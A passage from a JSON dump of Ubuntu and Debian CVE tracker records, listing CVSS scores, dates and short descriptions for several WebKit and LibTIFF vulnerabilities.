"baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2390"], "modified": "2017-04-02T00:00:00", "id": "UB:CVE-2017-2390", "href": "https://ubuntu.com/security/CVE-2017-2390", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:03:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted web\nsite.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2386", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2386"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2386", "href": "https://ubuntu.com/security/CVE-2017-2386", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:03:12", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2469", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2469"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2469", "href": "https://ubuntu.com/security/CVE-2017-2469", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:14", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2459", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2459"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2459", "href": "https://ubuntu.com/security/CVE-2017-2459", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:14", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nconduct Universal XSS (UXSS) attacks via crafted frame objects.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2445", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2445"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2445", "href": "https://ubuntu.com/security/CVE-2017-2445", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:03:13", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2465", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2465"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2465", "href": "https://ubuntu.com/security/CVE-2017-2465", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:14", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2455", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2455"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2455", "href": "https://ubuntu.com/security/CVE-2017-2455", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:03:12", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is\naffected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The\nissue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2464", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2464"], "modified": "2017-04-01T00:00:00", "id": "UB:CVE-2017-2464", "href": "https://ubuntu.com/security/CVE-2017-2464", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:53:45", "description": "JavaScriptCore in WebKit allows attackers to cause a denial of service (out-of-bounds heap read) via a crafted Javascript file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-03T15:59:00", "type": "debiancve", "title": "CVE-2016-9642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642"], "modified": "2017-02-03T15:59:00", "id": "DEBIANCVE:CVE-2016-9642", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9642", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-12-14T17:53:45", "description": "The regex code in Webkit 2.4.11 allows remote attackers to cause a denial of service (memory consumption) as demonstrated in a large number of ($ (open parenthesis and dollar) followed by {-2,16} and a large number of +) (plus close parenthesis).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-03-07T16:59:00", "type": "debiancve", "title": "CVE-2016-9643", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9643"], "modified": "2017-03-07T16:59:00", "id": "DEBIANCVE:CVE-2016-9643", "href": "https://security-tracker.debian.org/tracker/CVE-2016-9643", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2396", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2396"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2396", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2396", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2395", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2395"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2395", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2395", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2476", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2476"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2476", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2476", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2468", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2468"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2468", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2468", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-09T06:03:36", "description": "The DumpModeEncode function in tif_dumpmode.c in the bmp2tiff tool in LibTIFF 4.0.6 and earlier, when the \"-c none\" option is used, allows remote attackers to cause a denial of service (buffer over-read) via a crafted BMP image.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-10-03T16:09:00", "type": "debiancve", "title": "CVE-2016-3619", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619"], "modified": "2016-10-03T16:09:00", "id": "DEBIANCVE:CVE-2016-3619", "href": "https://security-tracker.debian.org/tracker/CVE-2016-3619", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to conduct Universal XSS (UXSS) attacks via crafted use of frames on a web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2475", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2475"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2475", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2475", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2394", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2394"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2394", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2394", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:53:45", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2367"], "modified": "2017-04-02T01:59:00", "id": 